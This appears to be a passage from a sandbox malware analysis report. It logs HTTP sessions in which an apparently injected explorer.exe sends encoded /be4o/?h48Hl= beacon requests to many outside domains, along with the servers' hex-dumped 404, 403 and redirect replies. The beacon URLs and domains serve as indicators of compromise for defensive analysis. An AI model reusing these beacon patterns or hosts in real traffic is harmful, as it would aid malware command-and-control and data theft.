                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.580063105 CET11638OUTGET /be4o/?h48Hl=MXCJfAiixaQW23gb43srtNqd5bs2JuRcGlYNxDXnDFPSUKLWpR3/CyWyuFSDkL8/v7KL&iVP=6lL026g HTTP/1.1
                                                                                                                                                                                                                              Host: www.janhenningsen.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:56:57.600548983 CET11639INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 601
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:56:57 GMT
                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              58192.168.11.204986435.214.4.7080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:57:02.635396004 CET11639OUTGET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&iVP=6lL026g HTTP/1.1
                                                                                                                                                                                                                              Host: www.ooo-club.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:57:02.658315897 CET11640INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:57:02 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&iVP=6lL026g
                                                                                                                                                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                              X-HTTPS-Enforce: 1
                                                                                                                                                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              59192.168.11.204986566.29.154.15780C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:57:07.829157114 CET11641OUTGET /be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.buresdx.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:57:08.047563076 CET11641INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:57:07 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                              Content-Length: 277
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 72 65 73 64 78 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buresdx.com Port 80</address></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              6192.168.11.204978295.179.246.12580C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.742798090 CET8964OUTGET /be4o/?h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.waktuk.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.756628990 CET8964INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:51:40 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://waktuk.com/be4o/?h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              60192.168.11.204986823.227.38.7480C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.839608908 CET11667OUTGET /be4o/?h48Hl=jq9b4c7BaMhD9kdTAddwzOt+LNN1qoIISHwx1xbT8oPDlt6nx7w14q7WGmdhUJs/cSrW&iVP=6lL026g HTTP/1.1
                                                                                                                                                                                                                              Host: www.kaikkistore.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887648106 CET11669INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:57:25 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              X-Sorting-Hat-PodId: 215
                                                                                                                                                                                                                              X-Sorting-Hat-ShopId: 59546730662
                                                                                                                                                                                                                              X-Dc: gcp-europe-west1
                                                                                                                                                                                                                              X-Request-ID: e8a9a7ce-56d1-4369-a2f3-2ed7528383da
                                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                              X-Download-Options: noopen
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 6e112b9c8aa56961-FRA
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                              Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c
                                                                                                                                                                                                                              Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887728930 CET11670INData Raw: 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72
                                                                                                                                                                                                                              Data Ascii: ign-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{borde
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887780905 CET11672INData Raw: 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a
                                                                                                                                                                                                                              Data Ascii: "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887833118 CET11673INData Raw: 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0
                                                                                                                                                                                                                              Data Ascii: " }, "ja": { "title": "", "content-title": "
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887897015 CET11673INData Raw: 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20
                                                                                                                                                                                                                              Data Ascii: translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace
                                                                                                                                                                                                                              Feb 21, 2022 16:57:25.887955904 CET11673INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              61192.168.11.2049869185.190.39.5280C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.095345974 CET11675OUTGET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.dreamintelligent.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:57:36.622030020 CET11675INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                                              Location: https://www.dreamintelligent.com/be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:57:36 GMT
                                                                                                                                                                                                                              Server: LiteSpeed
                                                                                                                                                                                                                              Vary: User-Agent


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              62192.168.11.204987034.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.629331112 CET11676OUTGET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.josiemaran-supernatural.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:57:41.798185110 CET11677INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:57:41 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "61fc68f2-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              63192.168.11.204987145.195.115.7180C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:57:46.972162008 CET11677OUTGET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.rsxrsh.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:57:47.555888891 CET11678INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                              Server: nginx/1.20.1
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:57:47 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=gbk
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/5.6.40
                                                                                                                                                                                                                              Location: /404.html
                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              64192.168.11.204987234.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.499147892 CET11678OUTGET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.noireimpactcollective.net
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:57:52.668587923 CET11679INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:57:52 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "620175f5-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


